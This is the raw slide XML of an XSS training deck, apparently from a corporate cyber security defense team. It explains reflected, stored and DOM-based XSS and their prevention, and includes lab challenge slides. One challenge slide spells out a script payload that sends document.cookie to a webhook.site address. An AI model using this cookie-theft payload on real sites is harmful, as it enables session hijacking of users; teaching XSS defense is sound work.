      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:lvl1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1pPr>
      <a:lvl2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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6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6pPr>
      <a:lvl7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7pPr>
      <a:lvl8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8pPr>
      <a:lvl9pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="548474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1" sz="1067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Rakuten Global B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48" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="211" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="7469" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="38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tiff"/><Relationship Id="rId4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ja-JP" dirty="0"/>
              <a:t>Web Threats - XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-GB" altLang="ja-JP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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080000" y="3107530"/>
            <a:ext cx="4582670" cy="184547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GB" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>April 1, 2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>Version 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0"/>
              <a:t>Cyber Security Defense Department</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>Rakuten, Inc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-GB" altLang="ja-JP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6832D1-5616-8344-ACD5-1CF946CCD80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8965">
            <a:off x="7538272" y="-782737"/>
            <a:ext cx="5741620" cy="5741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5CBD20-8FC2-B844-8443-7E3F438089B8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348965">
            <a:off x="8449164" y="128154"/>
            <a:ext cx="3919837" cy="3919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35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2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BD4FCDE-4718-CB49-9B39-A6FEA39261E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334963" y="1091527"/>
            <a:ext cx="11522074" cy="4195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XSS is all about injecting code to be executed on the client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There are three types of XSS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Reflected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Stored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DOM-based (also known as Type-0, or client-side XSS)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We can prevent XSS via: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HTML entity encoding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Secure coding practices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Most modern browsers and frameworks provide some protection, but XSS is still a widespread issue across modern web applications. In 2018, Google paid out $1.2million alone for XSS bugs found.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0C175-8E1B-1341-925F-2BA202DF0246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B09A4-727E-664F-882F-5147D7A45187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="5641131"/>
            <a:ext cx="3227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Review of key points</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-GB" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3063043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80428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1A7881-6FF5-8748-BD7C-BD468F716463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="814192"/>
            <a:ext cx="7010400" cy="1753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8D454A-2000-5F41-92EE-7C2AF9111C77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="941669"/>
            <a:ext cx="5895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3200" b="1" dirty="0"/>
              <a:t>Part 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Introduction to Cross-Site Scripting (XSS)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8CD57B-A857-C648-83D3-171ED8BC7E5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3075326"/>
            <a:ext cx="7010400" cy="17536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3EA66A-8491-3A4F-8E3B-E4B07793E7C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="3202803"/>
            <a:ext cx="58951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3200" b="1" dirty="0"/>
              <a:t>Part 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Lab exercises </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" sz="1600" i="1" dirty="0"/>
              <a:t>(the fun part…)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-GB" sz="2400" i="1" dirty="0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4A277501-96BE-834A-9C30-297FBF110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45364" y="3494948"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11" descr="Eye">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8325D217-4851-F047-9EBE-0FAE97905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45364" y="1776789"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13" descr="Teacher">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B15051-C48E-B546-A927-9434016547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45364" y="961522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57EAED-BFB6-7D4C-B381-5D51DC5C021F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8417832" y="1172501"/>
            <a:ext cx="314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/>
              <a:t>Explanation - what is XSS?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067038-5433-3743-83FD-B85C453B9623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="2049323"/>
            <a:ext cx="3239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/>
              <a:t>Demo - see how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS works</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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382AF-D010-684A-889D-FD404547622C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8397862" y="3628982"/>
            <a:ext cx="33222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/>
              <a:t>Exercises to challenge and deepen your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500743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CA8692-DD2C-C44E-9982-01125F2C4971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1F9D0-808B-5E4D-9AF6-C05F64D7DD62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21181350">
            <a:off x="4940449" y="1294806"/>
            <a:ext cx="13532551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&lt;meta charset="utf-8"&gt;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&lt;title&gt;Challenge 01&lt;/title&gt;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&lt;body style="font-family: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arial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&lt;div style="width: 30em; margin:5em auto 0;  background-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#EEE; padding: 1em;"&gt;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&lt;form action="/pa55word1-ee475kg3d/chall01-UGE1NXdvcmQxe3NuZWFreSF9.php" method="get"&gt;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Username:&lt;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 " " &gt;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&lt;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webhook.site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collect.gif?cookie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 + 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document.cookie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'" /&gt;</a:t>
            </a:r>
          </a:p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&lt;/script&gt;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&lt;" name="user" placeholder="Username"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Password:&lt;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type="password" name="password" placeholder="Password"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type="submit" name="submit"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&lt;a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stlye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="font-size:0.5em"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="/pa55word1-ee475kg3d/chall01-UGE1NXdvcmQxe3NuZWFreSF9.php?forgotten_password=true"&gt;Forgotten password&lt;/a&gt;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&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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1DBC6B-7DA3-D44A-B585-CF7FA508187C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="5641131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What is XSS?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47EAE-56ED-0F4B-828A-ABAB5A39D444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="1411498"/>
            <a:ext cx="56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Injecting client-side scripts into web applications.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F0A62-EDF0-6A4F-93E9-CA283BB4FD78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="2030183"/>
            <a:ext cx="3917863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XSS is injecting our code into a web application to be executed on the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What can we do with XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60007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9CA8692-DD2C-C44E-9982-01125F2C4971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01F9D0-808B-5E4D-9AF6-C05F64D7DD62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21181350">
            <a:off x="4940449" y="1294806"/>
            <a:ext cx="13532551" cy="5509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&lt;!doctype HTML&gt;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&lt;html&gt;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&lt;head&gt;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&lt;meta charset="utf-8"&gt;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&lt;title&gt;Challenge 01&lt;/title&gt;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&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr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&lt;body style="font-family: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arial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;"&gt;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&lt;div style="width: 30em; margin:5em auto 0;  background-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: #EEE; padding: 1em;"&gt;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  &lt;form action="/pa55word1-ee475kg3d/chall01-UGE1NXdvcmQxe3NuZWFreSF9.php" method="get"&gt;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Username:&lt;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 " " &gt;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&lt;script&gt;</a:t>
            </a:r>
          </a:p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 &lt;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="https://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webhook.site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collect.gif?cookie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=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1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document.cookie</a:t>
            </a:r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+ '" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB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&lt;/script&gt;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&lt;" name="user" placeholder="Username"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Password:&lt;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type="password" name="password" placeholder="Password"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&lt;input type="submit" name="submit"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/&gt;&lt;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br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/&gt;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  &lt;a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stlye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="font-size:0.5em" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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href</a:t>
            </a:r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="/pa55word1-ee475kg3d/chall01-UGE1NXdvcmQxe3NuZWFreSF9.php?forgotten_password=true"&gt;Forgotten password&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>      &lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-GB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1DBC6B-7DA3-D44A-B585-CF7FA508187C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="5641131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What is XSS?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647EAE-56ED-0F4B-828A-ABAB5A39D444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="1411498"/>
            <a:ext cx="5634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Injecting client-side scripts into web applications.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F0A62-EDF0-6A4F-93E9-CA283BB4FD78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="1906616"/>
            <a:ext cx="4291058" cy="2949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dirty="0"/>
              <a:t>      Stealing cookies &amp; sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>      Keylogging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" dirty="0"/>
              <a:t>      Bypassing security controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" dirty="0"/>
              <a:t>      Deface websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" dirty="0"/>
              <a:t>      Deploy malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>      Access webcams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>      Troll thousands of MySpace users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Skull">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7EECCD-4EFD-424B-A199-78D68ED4C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1967414"/>
            <a:ext cx="435424" cy="435424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Graphic 34" descr="Skull">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A806A4BD-ED69-DB4C-83B3-26A84BEA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2368828"/>
            <a:ext cx="435424" cy="435424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Graphic 36" descr="Skull">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C89A1785-894A-CC4E-B4EC-16462D7CE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2792013"/>
            <a:ext cx="435424" cy="435424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Graphic 37" descr="Skull">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CFC38FA-8DAA-1C46-987E-59EEE9FF5D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3207941"/>
            <a:ext cx="435424" cy="435424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Graphic 38" descr="Skull">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A2DC35A-C8B4-A54F-AD8E-A1150AC61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3611630"/>
            <a:ext cx="435424" cy="435424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Graphic 39" descr="Skull">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF9B9D28-B066-9C4C-BBC7-5E65EF12D8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964" y="4037554"/>
            <a:ext cx="435424" cy="4354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CFAE12-E02A-F74B-83B6-975C4B953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964" y="4482527"/>
            <a:ext cx="435424" cy="35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3057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0AC5D2C-DBD8-BD48-9A0B-EAA752D45DFD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56E01-F725-2149-87EE-820C4843EDB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="5641131"/>
            <a:ext cx="5259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Reflected XSS - How does it work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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DCD39F2F-4F5D-1C4D-A45E-B86D2EF5E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180" y="1167595"/>
            <a:ext cx="1689652" cy="1689652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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8AE99688-98EB-9C42-91DE-B80CFBD85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808" y="1167595"/>
            <a:ext cx="1689652" cy="16896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D259BA-49A1-6948-A20E-F36102AB252B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2220460" y="1773882"/>
            <a:ext cx="259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4B4BC9-11BC-7545-8DB3-1F6C2E0FBC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820834" y="161999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GB" sz="1400" dirty="0"/>
              <a:t>Enter name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3FA481-2D97-7341-B57C-FF0167CEAE21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924178" y="1927770"/>
            <a:ext cx="902910" cy="201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691812-DE6E-F44E-B889-56BC07A01D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2839288" y="1403334"/>
            <a:ext cx="1358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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>alex</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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80356F-453F-204F-95AC-2B716319D021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2220460" y="1927770"/>
            <a:ext cx="2595720" cy="1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ECB1B2C-7E97-E740-9576-4674E7A288AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2598837" y="1946697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dirty="0"/>
              <a:t>&lt;p&gt;hi, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" dirty="0" err="1"/>
              <a:t>alex</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" dirty="0"/>
              <a:t>!&lt;/p&gt;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6BB8DC-C95F-7142-8B72-6D0E2FB235D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884210" y="1469643"/>
            <a:ext cx="4985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2800" dirty="0"/>
              <a:t>What if my name is name is </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" sz="2800" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Graphic 31" descr="Server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5D711EF-7F93-1B4E-9016-754A64BC6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79771" y="3221652"/>
            <a:ext cx="1689652" cy="1689652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497C1C1E-7F1F-BC4A-BF6A-4E17B50C14E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="494399" y="3221652"/>
            <a:ext cx="1689652" cy="1689652"/>
            <a:chOff x="494399" y="3221652"/>
            <a:chExt cx="1689652" cy="1689652"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Graphic 32" descr="Laptop">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41414BA6-38B5-BA49-AF64-5B15DF623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4399" y="3221652"/>
              <a:ext cx="1689652" cy="1689652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F8309C-0B15-9A43-945D-D82EE64ACE26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="784425" y="3674050"/>
              <a:ext cx="11095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GB" sz="1400" dirty="0"/>
                <a:t>Enter name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D7A369-6780-EB42-A82E-10678DCCF8FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="887769" y="3981827"/>
              <a:ext cx="902910" cy="201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GB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64819D-6421-4549-9F79-9B0919072189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2169692" y="3488869"/>
            <a:ext cx="2624436" cy="339070"/>
            <a:chOff x="2169692" y="3488869"/>
            <a:chExt cx="2624436" cy="339070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F63ACDA-CBAB-254E-9D73-B007FE478AAD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2184051" y="3827939"/>
              <a:ext cx="259572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9606A4-C9C9-084F-B7DC-44886CA51CCF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2169692" y="3488869"/>
              <a:ext cx="26244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name=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-GB" sz="1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3CF48-CD10-B644-BA8B-79B3557F6D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2152129" y="3981827"/>
            <a:ext cx="2627642" cy="342969"/>
            <a:chOff x="2152129" y="3981827"/>
            <a:chExt cx="2627642" cy="34296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725EDCA-18CA-7F40-810A-D87EA1EE3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4051" y="3981827"/>
              <a:ext cx="2595720" cy="189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2DD172F-6F7F-EA47-B3EC-BD000936C10B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2152129" y="4047797"/>
              <a:ext cx="26276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sz="1200" dirty="0"/>
                <a:t>&lt;p&gt;hi, </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-GB" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-GB" sz="1200" dirty="0"/>
                <a:t>!&lt;/p&gt;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5B10EA41-BA41-3A4B-9532-3F1E28233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4210" y="3499625"/>
            <a:ext cx="3960435" cy="1096344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ED97A005-B375-164E-8BAA-3FD18ADFF420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="1176412">
            <a:off x="7588950" y="2619721"/>
            <a:ext cx="2671081" cy="2671081"/>
            <a:chOff x="7894965" y="2492397"/>
            <a:chExt cx="2671081" cy="2671081"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Explosion 2 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91522188-8B8E-644E-B8E2-8F53A7DD0758}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7894965" y="2492397"/>
              <a:ext cx="2671081" cy="2671081"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="762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GB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65ABC-E449-C742-9E3A-C309D3EC8C02}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="18900000">
              <a:off x="8106399" y="3783614"/>
              <a:ext cx="1980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GB" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
